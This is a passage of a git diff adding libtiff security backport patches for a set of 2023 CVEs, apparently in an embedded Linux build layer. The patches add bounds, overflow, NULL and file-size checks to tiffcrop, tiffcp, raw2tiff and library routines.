157+ TIFFError("rotateImage",
158+ "Unable to allocate rotation buffer of %" TIFF_SSIZE_FORMAT
159+ " bytes ",
160+ buffsize + NUM_BUFF_OVERSIZE_BYTES);
161 return (-1);
162 }
163 _TIFFmemset(rbuff, '\0', buffsize + NUM_BUFF_OVERSIZE_BYTES);
164
165+ if (rot_buf_size != NULL)
166+ *rot_buf_size = buffsize;
167+
168 ibuff = *ibuff_ptr;
169 switch (rotation)
170 {
171--
1722.25.1
173
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-25434-CVE-2023-25435.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-25434-CVE-2023-25435.patch
new file mode 100644
index 0000000000..6a6596f092
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-25434-CVE-2023-25435.patch
@@ -0,0 +1,94 @@
1From 69818e2f2d246e6631ac2a2da692c3706b849c38 Mon Sep 17 00:00:00 2001
2From: Su_Laus <sulau@freenet.de>
3Date: Sun, 29 Jan 2023 11:09:26 +0100
4Subject: [PATCH] tiffcrop: Amend rotateImage() not to toggle the input (main)
5 image width and length parameters when only cropped image sections are
6 rotated. Remove buffptr from region structure because never used.
7
8Closes #492 #493 #494 #495 #499 #518 #519
9
10Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/69818e2f2d246e6631ac2a2da692c3706b849c38]
11CVE: CVE-2023-25434 & CVE-2023-25435
12Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
13---
14 tools/tiffcrop.c | 29 +++++++++++++++++------------
15 1 file changed, 17 insertions(+), 12 deletions(-)
16
17diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
18index aab0ec6..ce84414 100644
19--- a/tools/tiffcrop.c
20+++ b/tools/tiffcrop.c
21@@ -531,7 +531,7 @@ static int rotateContigSamples24bits(uint16, uint16, uint16, uint32,
22 static int rotateContigSamples32bits(uint16, uint16, uint16, uint32,
23 uint32, uint32, uint8 *, uint8 *);
24 static int rotateImage(uint16, struct image_data *, uint32 *, uint32 *,
25- unsigned char **, size_t *);
26+ unsigned char **, size_t *, int);
27 static int mirrorImage(uint16, uint16, uint16, uint32, uint32,
28 unsigned char *);
29 static int invertImage(uint16, uint16, uint16, uint32, uint32,
30@@ -6382,10 +6382,11 @@ static int correct_orientation(struct image_data *image, unsigned char **work_b
31 /* Dummy variable in order not to switch two times the
32 * image->width,->length within rotateImage(),
33 * but switch xres, yres there. */
34- uint32_t width = image->width;
35- uint32_t length = image->length;
36- if (rotateImage(rotation, image, &width, &length, work_buff_ptr, NULL))
37- {
38+ uint32_t width = image->width;
39+ uint32_t length = image->length;
40+ if (rotateImage(rotation, image, &width, &length, work_buff_ptr, NULL,
41+ TRUE))
42+ {
43 TIFFError ("correct_orientation", "Unable to rotate image");
44 return (-1);
45 }
46@@ -7612,7 +7613,8 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
47 * accordingly. */
48 size_t rot_buf_size = 0;
49 if (rotateImage(crop->rotation, image, &crop->combined_width,
50- &crop->combined_length, &crop_buff, &rot_buf_size))
51+ &crop->combined_length, &crop_buff, &rot_buf_size,
52+ FALSE))
53 {
54 TIFFError("processCropSelections",
55 "Failed to rotate composite regions by %d degrees", crop->rotation);
56@@ -7721,9 +7723,10 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
57 * its size individually. Therefore, seg_buffs size needs to be
58 * updated accordingly. */
59 size_t rot_buf_size = 0;
60- if (rotateImage(
61- crop->rotation, image, &crop->regionlist[i].width,
62- &crop->regionlist[i].length, &crop_buff, &rot_buf_size))
63+ if (rotateImage(crop->rotation, image,
64+ &crop->regionlist[i].width,
65+ &crop->regionlist[i].length, &crop_buff,
66+ &rot_buf_size, FALSE))
67 {
68 TIFFError("processCropSelections",
69 "Failed to rotate crop region by %d degrees", crop->rotation);
70@@ -7853,7 +7856,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
71 if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
72 {
73 if (rotateImage(crop->rotation, image, &crop->combined_width,
74- &crop->combined_length, crop_buff_ptr, NULL))
75+ &crop->combined_length, crop_buff_ptr, NULL, TRUE))
76 {
77 TIFFError("createCroppedImage",
78 "Failed to rotate image or cropped selection by %d degrees", crop->rotation);
79@@ -8515,8 +8518,10 @@ rotateContigSamples32bits(uint16 rotation, uint16 spp, uint16 bps, uint32 width,
80
81 /* Rotate an image by a multiple of 90 degrees clockwise */
82 static int
83-rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
84- uint32 *img_length, unsigned char **ibuff_ptr, int rot_image_params)
85+rotateImage(uint16 rotation, struct image_data *image,
86+ uint32 *img_width, uint32 *img_length,
87+ unsigned char **ibuff_ptr, size_t *rot_buf_size,
88+ int rot_image_params)
89 {
90 int shift_width;
91 uint32 bytes_per_pixel, bytes_per_sample;
92--
932.25.1
94
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-26965.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-26965.patch
new file mode 100644
index 0000000000..b7a7e93764
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-26965.patch
@@ -0,0 +1,90 @@
1From ec8ef90c1f573c9eb1f17d6a056aa0015f184acf Mon Sep 17 00:00:00 2001
2From: Su_Laus <sulau@freenet.de>
3Date: Tue, 14 Feb 2023 20:43:43 +0100
4Subject: [PATCH] tiffcrop: Do not reuse input buffer for subsequent images.
5 Fix issue 527
6
7Reuse of read_buff within loadImage() from previous image is quite unsafe, because other functions (like rotateImage() etc.) reallocate that buffer with different size without updating the local prev_readsize value.
8
9Closes #527
10
11Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u8.debian.tar.xz]
12CVE: CVE-2023-26965
13Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
14---
15 tools/tiffcrop.c | 40 ++++++++++------------------------------
16 1 file changed, 10 insertions(+), 30 deletions(-)
17
18diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
19index ce84414..a533089 100644
20--- a/tools/tiffcrop.c
21+++ b/tools/tiffcrop.c
22@@ -5935,9 +5935,7 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
23 uint32 tw = 0, tl = 0; /* Tile width and length */
24 tmsize_t tile_rowsize = 0;
25 unsigned char *read_buff = NULL;
26- unsigned char *new_buff = NULL;
27 int readunit = 0;
28- static tmsize_t prev_readsize = 0;
29
30 TIFFGetFieldDefaulted(in, TIFFTAG_BITSPERSAMPLE, &bps);
31 TIFFGetFieldDefaulted(in, TIFFTAG_SAMPLESPERPIXEL, &spp);
32@@ -6232,37 +6230,20 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
33 read_buff = *read_ptr;
34 /* +3 : add a few guard bytes since reverseSamples16bits() can read a bit */
35 /* outside buffer */
36- if (!read_buff)
37+ if (read_buff)
38 {
39- if( buffsize > 0xFFFFFFFFU - 3 )
40- {
41- TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
42- return (-1);
43- }
44- read_buff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
45+ _TIFFfree(read_buff);
46 }
47- else
48- {
49- if (prev_readsize < buffsize)
50- {
51- if( buffsize > 0xFFFFFFFFU - 3 )
52- {
53- TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
54- return (-1);
55- }
56- new_buff = _TIFFrealloc(read_buff, buffsize + NUM_BUFF_OVERSIZE_BYTES);
57- if (!new_buff)
58- {
59- free (read_buff);
60- read_buff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
61- }
62- else
63- read_buff = new_buff;
64- }
65- }
66+ if (buffsize > 0xFFFFFFFFU - 3)
67+ {
68+ TIFFError("loadImage", "Required read buffer size too large");
69+ return (-1);
70+ }
71+ read_buff =
72+ (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
73 if (!read_buff)
74 {
75- TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
76+ TIFFError("loadImage", "Unable to allocate read buffer");
77 return (-1);
78 }
79
80@@ -6270,7 +6251,6 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
81 read_buff[buffsize+1] = 0;
82 read_buff[buffsize+2] = 0;
83
84- prev_readsize = buffsize;
85 *read_ptr = read_buff;
86
87 /* N.B. The read functions used copy separate plane data into a buffer as interleaved
88--
892.25.1
90
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-26966.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-26966.patch
new file mode 100644
index 0000000000..48657e6aa4
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-26966.patch
@@ -0,0 +1,35 @@
1From b0e1c25dd1d065200c8d8f59ad0afe014861a1b9 Mon Sep 17 00:00:00 2001
2From: Su_Laus <sulau@freenet.de>
3Date: Thu, 16 Feb 2023 12:03:16 +0100
4Subject: [PATCH] tif_luv: Check and correct for NaN data in uv_encode().
5
6Closes #530
7
8Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u8.debian.tar.xz]
9CVE: CVE-2023-26966
10Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
11---
12 libtiff/tif_luv.c | 7 +++++++
13 1 file changed, 7 insertions(+)
14
15diff --git a/libtiff/tif_luv.c b/libtiff/tif_luv.c
16index 6fe4858..8b2c5f1 100644
17--- a/libtiff/tif_luv.c
18+++ b/libtiff/tif_luv.c
19@@ -923,6 +923,13 @@ uv_encode(double u, double v, int em) /* encode (u',v') coordinates */
20 {
21 register int vi, ui;
22
23+ /* check for NaN */
24+ if (u != u || v != v)
25+ {
26+ u = U_NEU;
27+ v = V_NEU;
28+ }
29+
30 if (v < UV_VSTART)
31 return oog_encode(u, v);
32 vi = itrunc((v - UV_VSTART)*(1./UV_SQSIZ), em);
33--
342.25.1
35
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-2908.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-2908.patch
new file mode 100644
index 0000000000..62a5e1831c
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-2908.patch
@@ -0,0 +1,33 @@
1From 8c0859a80444c90b8dfb862a9f16de74e16f0a9e Mon Sep 17 00:00:00 2001
2From: xiaoxiaoafeifei <lliangliang2007@163.com>
3Date: Fri, 21 Apr 2023 13:01:34 +0000
4Subject: [PATCH] countInkNamesString(): fix `UndefinedBehaviorSanitizer`:
5 applying zero offset to null pointer
6
7Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/9bd48f0dbd64fb94dc2b5b05238fde0bfdd4ff3f]
8CVE: CVE-2023-2908
9Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
10---
11 libtiff/tif_dir.c | 4 ++--
12 1 file changed, 2 insertions(+), 2 deletions(-)
13
14diff --git a/libtiff/tif_dir.c b/libtiff/tif_dir.c
15index 9d8267a..6389b40 100644
16--- a/libtiff/tif_dir.c
17+++ b/libtiff/tif_dir.c
18@@ -145,10 +145,10 @@ static uint16
19 countInkNamesString(TIFF *tif, uint32 slen, const char *s)
20 {
21 uint16 i = 0;
22- const char *ep = s + slen;
23- const char *cp = s;
24
25 if (slen > 0) {
26+ const char *ep = s + slen;
27+ const char *cp = s;
28 do {
29 for (; cp < ep && *cp != '\0'; cp++) {}
30 if (cp >= ep)
31--
322.25.1
33
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-3316.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-3316.patch
new file mode 100644
index 0000000000..8db24fc714
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-3316.patch
@@ -0,0 +1,59 @@
1From d63de61b1ec3385f6383ef9a1f453e4b8b11d536 Mon Sep 17 00:00:00 2001
2From: Su_Laus <sulau@freenet.de>
3Date: Fri, 3 Feb 2023 17:38:55 +0100
4Subject: [PATCH] TIFFClose() avoid NULL pointer dereferencing. fix#515
5
6Closes #515
7
8Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/d63de61b1ec3385f6383ef9a1f453e4b8b11d536]
9CVE: CVE-2023-3316
10Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
11---
12 libtiff/tif_close.c | 11 +++++++----
13 tools/tiffcrop.c | 5 ++++-
14 2 files changed, 11 insertions(+), 5 deletions(-)
15
16diff --git a/libtiff/tif_close.c b/libtiff/tif_close.c
17index e4228df..335e80f 100644
18--- a/libtiff/tif_close.c
19+++ b/libtiff/tif_close.c
20@@ -118,13 +118,16 @@ TIFFCleanup(TIFF* tif)
21 */
22
23 void
24-TIFFClose(TIFF* tif)
25+TIFFClose(TIFF *tif)
26 {
27- TIFFCloseProc closeproc = tif->tif_closeproc;
28- thandle_t fd = tif->tif_clientdata;
29+ if (tif != NULL)
30+ {
31+ TIFFCloseProc closeproc = tif->tif_closeproc;
32+ thandle_t fd = tif->tif_clientdata;
33
34 TIFFCleanup(tif);
35- (void) (*closeproc)(fd);
36+ (void)(*closeproc)(fd);
37+ }
38 }
39
40 /* vim: set ts=8 sts=8 sw=8 noet: */
41diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
42index a533089..f14bb0c 100644
43--- a/tools/tiffcrop.c
44+++ b/tools/tiffcrop.c
45@@ -2526,7 +2526,10 @@ main(int argc, char* argv[])
46 }
47 }
48
49- TIFFClose(out);
50+ if (out != NULL)
51+ {
52+ TIFFClose(out);
53+ }
54
55 return (0);
56 } /* end main */
57--
582.25.1
59
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-3576.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-3576.patch
new file mode 100644
index 0000000000..67837fe142
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-3576.patch
@@ -0,0 +1,35 @@
1From 881a070194783561fd209b7c789a4e75566f7f37 Mon Sep 17 00:00:00 2001
2From: zhailiangliang <zhailiangliang@loongson.cn>
3Date: Tue, 7 Mar 2023 15:02:08 +0800
4Subject: [PATCH] Fix memory leak in tiffcrop.c
5
6Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/881a070194783561fd209b7c789a4e75566f7f37]
7CVE: CVE-2023-3576
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
10---
11 tools/tiffcrop.c | 7 ++++++-
12 1 file changed, 6 insertions(+), 1 deletion(-)
13
14diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
15index f14bb0c..7121c7c 100644
16--- a/tools/tiffcrop.c
17+++ b/tools/tiffcrop.c
18@@ -7746,8 +7746,13 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
19
20 read_buff = *read_buff_ptr;
21
22+ /* Memory is freed before crop_buff_ptr is overwritten */
23+ if (*crop_buff_ptr != NULL)
24+ {
25+ _TIFFfree(*crop_buff_ptr);
26+ }
27+
28 /* process full image, no crop buffer needed */
29- crop_buff = read_buff;
30 *crop_buff_ptr = read_buff;
31 crop->combined_width = image->width;
32 crop->combined_length = image->length;
33--
342.25.1
35
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-3618.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-3618.patch
new file mode 100644
index 0000000000..fd67305c0b
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-3618.patch
@@ -0,0 +1,47 @@
1From b5c7d4c4e03333ac16b5cfb11acaaeaa493334f8 Mon Sep 17 00:00:00 2001
2From: Su_Laus <sulau@freenet.de>
3Date: Fri, 5 May 2023 19:43:46 +0200
4Subject: [PATCH] Consider error return of writeSelections(). Fixes #553
5
6Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/b5c7d4c4e03333ac16b5cfb11acaaeaa493334f8]
7CVE: CVE-2023-3618
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 tools/tiffcrop.c | 14 ++++++++++----
11 1 file changed, 10 insertions(+), 4 deletions(-)
12
13diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
14index 7121c7c..93b7f96 100644
15--- a/tools/tiffcrop.c
16+++ b/tools/tiffcrop.c
17@@ -2437,9 +2437,15 @@ main(int argc, char* argv[])
18 { /* Whole image or sections not based on output page size */
19 if (crop.selections > 0)
20 {
21- writeSelections(in, &out, &crop, &image, &dump, seg_buffs,
22- mp, argv[argc - 1], &next_page, total_pages);
23- }
24+ if (writeSelections(in, &out, &crop, &image, &dump,
25+ seg_buffs, mp, argv[argc - 1],
26+ &next_page, total_pages))
27+ {
28+ TIFFError("main",
29+ "Unable to write new image selections");
30+ exit(EXIT_FAILURE);
31+ }
32+ }
33 else /* One file all images and sections */
34 {
35 if (update_output_file (&out, mp, crop.exp_mode, argv[argc - 1],
36@@ -7749,7 +7755,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
37 /* Memory is freed before crop_buff_ptr is overwritten */
38 if (*crop_buff_ptr != NULL)
39 {
40- _TIFFfree(*crop_buff_ptr);
41+ _TIFFfree(*crop_buff_ptr);
42 }
43
44 /* process full image, no crop buffer needed */
45--
462.25.1
47
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-40745.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-40745.patch
new file mode 100644
index 0000000000..6eb286039f
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-40745.patch
@@ -0,0 +1,34 @@
1From 4fc16f649fa2875d5c388cf2edc295510a247ee5 Mon Sep 17 00:00:00 2001
2From: Arie Haenel <arie.haenel@jct.ac.il>
3Date: Wed, 19 Jul 2023 19:34:25 +0000
4Subject: [PATCH] tiffcp: fix memory corruption (overflow) on hostile images
5 (fixes #591)
6
7Upstream-Status: Backport from [https://gitlab.com/libtiff/libtiff/-/commit/4fc16f649fa2875d5c388cf2edc295510a247ee5]
8CVE: CVE-2023-40745
9Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
10---
11 tools/tiffcp.c | 7 +++++++
12 1 file changed, 7 insertions(+)
13
14diff --git a/tools/tiffcp.c b/tools/tiffcp.c
15index 83b3910..007bd05 100644
16--- a/tools/tiffcp.c
17+++ b/tools/tiffcp.c
18@@ -1437,6 +1437,13 @@ DECLAREreadFunc(readSeparateTilesIntoBuffer)
19 TIFFError(TIFFFileName(in), "Error, cannot handle that much samples per tile row (Tile Width * Samples/Pixel)");
20 return 0;
21 }
22+
23+ if ( (imagew - tilew * spp) > INT_MAX ){
24+ TIFFError(TIFFFileName(in),
25+ "Error, image raster scan line size is too large");
26+ return 0;
27+ }
28+
29 iskew = imagew - tilew*spp;
30 tilebuf = _TIFFmalloc(tilesize);
31 if (tilebuf == 0)
32--
332.25.1
34
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-41175.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-41175.patch
new file mode 100644
index 0000000000..3f44a42012
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-41175.patch
@@ -0,0 +1,67 @@
1From 4cc97e3dfa6559f4d17af0d0687bcae07ca4b73d Mon Sep 17 00:00:00 2001
2From: Arie Haenel <arie.haenel@jct.ac.il>
3Date: Wed, 19 Jul 2023 19:40:01 +0000
4Subject: raw2tiff: fix integer overflow and bypass of the check (fixes #592)
5
6Upstream-Status: Backport [import from debian security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u8.debian.tar.xz
7Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/6e2dac5f904496d127c92ddc4e56eccfca25c2ee]
8CVE: CVE-2023-41175
9Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
10---
11 tools/raw2tiff.c | 26 ++++++++++++++++++++++++++
12 1 file changed, 26 insertions(+)
13
14diff --git a/tools/raw2tiff.c b/tools/raw2tiff.c
15index ab36ff4e..a905da52 100644
16--- a/tools/raw2tiff.c
17+++ b/tools/raw2tiff.c
18@@ -35,6 +35,7 @@
19 #include <sys/types.h>
20 #include <math.h>
21 #include <ctype.h>
22+#include <limits.h>
23
24 #ifdef HAVE_UNISTD_H
25 # include <unistd.h>
26@@ -101,6 +102,7 @@ main(int argc, char* argv[])
27 int fd;
28 char *outfilename = NULL;
29 TIFF *out;
30+ uint32 temp_limit_check = 0;
31
32 uint32 row, col, band;
33 int c;
34@@ -212,6 +214,30 @@ main(int argc, char* argv[])
35 if (guessSize(fd, dtype, hdr_size, nbands, swab, &width, &length) < 0)
36 return 1;
37
38+ if ((width == 0) || (length == 0) ){
39+ fprintf(stderr, "Too large nbands value specified.\n");
40+ return (EXIT_FAILURE);
41+ }
42+
43+ temp_limit_check = nbands * depth;
44+
45+ if ( !temp_limit_check || length > ( UINT_MAX / temp_limit_check ) ) {
46+ fprintf(stderr, "Too large length size specified.\n");
47+ return (EXIT_FAILURE);
48+ }
49+ temp_limit_check = temp_limit_check * length;
50+
51+ if ( !temp_limit_check || width > ( UINT_MAX / temp_limit_check ) ) {
52+ fprintf(stderr, "Too large width size specified.\n");
53+ return (EXIT_FAILURE);
54+ }
55+ temp_limit_check = temp_limit_check * width;
56+
57+ if ( !temp_limit_check || hdr_size > ( UINT_MAX - temp_limit_check ) ) {
58+ fprintf(stderr, "Too large header size specified.\n");
59+ return (EXIT_FAILURE);
60+ }
61+
62 if (outfilename == NULL)
63 outfilename = argv[optind+1];
64 out = TIFFOpen(outfilename, "w");
65--
662.30.2
67
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-52356.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-52356.patch
new file mode 100644
index 0000000000..1b651e6529
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-52356.patch
@@ -0,0 +1,53 @@
1[Ubuntu note: Backport of the following patch from upstream, with a few changes
2to match the current version of the file in the present Ubuntu release:
3 . using TIFFErrorExt instead of TIFFErrorExtR (the latter did not exist yet);
4-- Rodrigo Figueiredo Zaiden]
5
6Backport of:
7
8From 51558511bdbbcffdce534db21dbaf5d54b31638a Mon Sep 17 00:00:00 2001
9From: Even Rouault <even.rouault@spatialys.com>
10Date: Tue, 31 Oct 2023 15:58:41 +0100
11Subject: [PATCH] TIFFReadRGBAStrip/TIFFReadRGBATile: add more validation of
12 col/row (fixes #622)
13
14Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-52356.patch?h=ubuntu/focal-security
15Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/51558511bdbbcffdce534db21dbaf5d54b31638a]
16CVE: CVE-2023-52356
17Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
18---
19 libtiff/tif_getimage.c | 15 +++++++++++++++
20 1 file changed, 15 insertions(+)
21
22
23--- tiff-4.1.0+git191117.orig/libtiff/tif_getimage.c
24+++ tiff-4.1.0+git191117/libtiff/tif_getimage.c
25@@ -2926,6 +2926,13 @@ TIFFReadRGBAStripExt(TIFF* tif, uint32 r
26 }
27
28 if (TIFFRGBAImageOK(tif, emsg) && TIFFRGBAImageBegin(&img, tif, stop_on_error, emsg)) {
29+ if (row >= img.height)
30+ {
31+ TIFFErrorExt(tif->tif_clientdata, TIFFFileName(tif),
32+ "Invalid row passed to TIFFReadRGBAStrip().");
33+ TIFFRGBAImageEnd(&img);
34+ return (0);
35+ }
36
37 img.row_offset = row;
38 img.col_offset = 0;
39@@ -3002,6 +3009,14 @@ TIFFReadRGBATileExt(TIFF* tif, uint32 co
40 return( 0 );
41 }
42
43+ if (col >= img.width || row >= img.height)
44+ {
45+ TIFFErrorExt(tif->tif_clientdata, TIFFFileName(tif),
46+ "Invalid row/col passed to TIFFReadRGBATile().");
47+ TIFFRGBAImageEnd(&img);
48+ return (0);
49+ }
50+
51 /*
52 * The TIFFRGBAImageGet() function doesn't allow us to get off the
53 * edge of the image, even to fill an otherwise valid tile. So we
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-6228.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-6228.patch
new file mode 100644
index 0000000000..a777dea9b0
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6228.patch
@@ -0,0 +1,30 @@
1From 1e7d217a323eac701b134afc4ae39b6bdfdbc96a Mon Sep 17 00:00:00 2001
2From: Su_Laus <sulau@freenet.de>
3Date: Sat, 9 Sep 2023 15:45:47 +0200
4Subject: [PATCH] Check also if codec of input image is available,
5 independently from codec check of output image and return with error if not.
6 Fixes #606.
7
8Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/1e7d217a323eac701b134afc4ae39b6bdfdbc96a]
9CVE: CVE-2023-6228
10Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
11---
12 tools/tiffcp.c | 2 ++
13 1 file changed, 2 insertions(+)
14
15diff --git a/tools/tiffcp.c b/tools/tiffcp.c
16index 007bd05..d2f7b66 100644
17--- a/tools/tiffcp.c
18+++ b/tools/tiffcp.c
19@@ -628,6 +628,8 @@ tiffcp(TIFF* in, TIFF* out)
20 else
21 CopyField(TIFFTAG_COMPRESSION, compression);
22 TIFFGetFieldDefaulted(in, TIFFTAG_COMPRESSION, &input_compression);
23+ if (!TIFFIsCODECConfigured(input_compression))
24+ return FALSE;
25 TIFFGetFieldDefaulted(in, TIFFTAG_PHOTOMETRIC, &input_photometric);
26 if (input_compression == COMPRESSION_JPEG) {
27 /* Force conversion to RGB */
28--
292.25.1
30
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-1.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-1.patch
new file mode 100644
index 0000000000..e955b3f2e4
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-1.patch
@@ -0,0 +1,191 @@
1[Ubuntu note: Backport of the following patch from upstream, with a few changes
2to match the current version of the file in the present Ubuntu release:
3 . included inttypes.h header to support PRIu32 and PRIu64;
4 . using TIFFWarningExt instead of TIFFWarningExtR (the latter did not exist yet);
5 . using uint64 instead of uint64_t to preserve the current code usage;
6 . calling _TIFFfree(data) instead of _TIFFfreeExt(tif, data) (the latter did not exist yet);
7 . calls to the check size, that is the idea of the patch, were added before
8 _TIFFCheckMalloc and may note match the original patch methods;
9-- Rodrigo Figueiredo Zaiden]
10
11Backport of:
12
13From 5320c9d89c054fa805d037d84c57da874470b01a Mon Sep 17 00:00:00 2001
14From: Su Laus <sulau@freenet.de>
15Date: Tue, 31 Oct 2023 15:43:29 +0000
16Subject: [PATCH] Prevent some out-of-memory attacks
17
18Some small fuzzer files fake large amounts of data and provoke out-of-memory situations. For non-compressed data content / tags, out-of-memory can be prevented by comparing with the file size.
19
20At image reading, data size of some tags / data structures (StripByteCounts, StripOffsets, StripArray, TIFF directory) is compared with file size to prevent provoked out-of-memory attacks.
21
22See issue https://gitlab.com/libtiff/libtiff/-/issues/614#note_1602683857
23
24Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-6277-1.patch?h=ubuntu/focal-security
25Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/5320c9d89c054fa805d037d84c57da874470b01a]
26CVE: CVE-2023-6277
27Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
28---
29 libtiff/tif_dirread.c | 92 ++++++++++++++++++++++++++++++++++++++++++-
30 1 file changed, 90 insertions(+), 2 deletions(-)
31
32--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
33+++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
34@@ -37,6 +37,7 @@
35 #include "tiffiop.h"
36 #include <float.h>
37 #include <stdlib.h>
38+#include <inttypes.h>
39
40 #define FAILED_FII ((uint32) -1)
41
42@@ -863,6 +864,21 @@ static enum TIFFReadDirEntryErr TIFFRead
43 datasize=(*count)*typesize;
44 assert((tmsize_t)datasize>0);
45
46+ /* Before allocating a huge amount of memory for corrupted files, check if
47+ * size of requested memory is not greater than file size.
48+ */
49+ uint64 filesize = TIFFGetFileSize(tif);
50+ if (datasize > filesize)
51+ {
52+ TIFFWarningExt(tif->tif_clientdata, "ReadDirEntryArray",
53+ "Requested memory size for tag %d (0x%x) %" PRIu32
54+ " is greather than filesize %" PRIu64
55+ ". Memory not allocated, tag not read",
56+ direntry->tdir_tag, direntry->tdir_tag, datasize,
57+ filesize);
58+ return (TIFFReadDirEntryErrAlloc);
59+ }
60+
61 if( isMapped(tif) && datasize > (uint32)tif->tif_size )
62 return TIFFReadDirEntryErrIo;
63
64@@ -4534,6 +4550,20 @@ EstimateStripByteCounts(TIFF* tif, TIFFD
65 if( !_TIFFFillStrilesInternal( tif, 0 ) )
66 return -1;
67
68+ /* Before allocating a huge amount of memory for corrupted files, check if
69+ * size of requested memory is not greater than file size. */
70+ uint64 filesize = TIFFGetFileSize(tif);
71+ uint64 allocsize = (uint64)td->td_nstrips * sizeof(uint64);
72+ if (allocsize > filesize)
73+ {
74+ TIFFWarningExt(tif->tif_clientdata, module,
75+ "Requested memory size for StripByteCounts of %" PRIu64
76+ " is greather than filesize %" PRIu64
77+ ". Memory not allocated",
78+ allocsize, filesize);
79+ return -1;
80+ }
81+
82 if (td->td_stripbytecount_p)
83 _TIFFfree(td->td_stripbytecount_p);
84 td->td_stripbytecount_p = (uint64*)
85@@ -4544,9 +4574,7 @@ EstimateStripByteCounts(TIFF* tif, TIFFD
86
87 if (td->td_compression != COMPRESSION_NONE) {
